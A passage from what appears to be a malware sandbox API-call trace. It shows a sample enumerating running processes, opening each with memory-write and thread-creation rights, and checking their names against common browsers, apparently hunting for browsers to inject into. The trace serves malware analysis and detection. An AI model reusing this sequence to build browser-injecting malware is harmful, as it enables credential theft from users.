	[0211.163] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.164] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3990
	[0211.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.164] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.164] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.165] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.165] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.166] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.167] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3994
	[0211.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.167] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.167] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.168] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.168] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.169] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.170] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3998
	[0211.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.170] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.170] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.171] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.171] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.172] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.172] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x399c
	[0211.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.173] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.173] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.174] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.174] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.174] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.175] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x39a0
	[0211.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.176] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.176] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.177] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.177] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.177] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.179] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x39a4
	[0211.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.179] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.180] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.180] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.181] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.181] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0211.182] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x39a8
	[0211.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.182] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0211.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.183] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.183] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0211.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.183] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.184] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.185] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x39ac
	[0211.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.185] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.185] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.186] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.186] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.187] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0211.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x39b0
	[0211.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.188] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.188] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.189] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.189] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.190] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0211.191] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x39b4
	[0211.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.191] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0211.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.191] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.192] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0211.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.192] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.193] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x39b8
	[0211.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.194] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.194] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.195] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.195] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.196] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0211.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x39bc
	[0211.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.197] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0211.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.197] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.198] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0211.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.198] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.199] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0211.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x39c0
	[0211.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.200] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0211.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.200] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.201] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0211.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.201] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.202] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0211.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x39c4
	[0211.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.203] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0211.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.203] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.203] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0211.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.204] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.204] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0211.205] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x39c8
	[0211.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.205] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0211.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.206] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.206] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0211.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.207] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.207] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0211.208] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0211.208] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0211.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x39cc
	[0211.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.209] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0211.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.210] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.211] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0211.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.212] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.213] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0211.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x39d0
	[0211.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.214] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0211.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.214] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.215] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0211.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.215] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.216] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0211.217] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x39d4
	[0211.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.217] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0211.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.217] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.218] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0211.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.218] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.219] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0211.220] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x39d8
	[0211.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.220] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0211.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.220] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.221] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0211.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.221] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.222] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0211.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x39dc
	[0211.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.223] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0211.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.224] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.226] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0211.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.227] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.227] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0211.228] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x39e0
	[0211.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.229] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0211.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.229] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.229] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0211.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.230] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.230] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0211.231] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x39e4
	[0211.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.231] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0211.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.232] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.232] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0211.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.233] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.234] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0211.235] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x39e8
	[0211.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.235] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0211.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.236] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.236] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0211.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.237] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.237] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0211.238] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x39ec
	[0211.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.239] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0211.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.239] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.239] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0211.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.240] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.240] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0211.241] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x39f0
	[0211.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
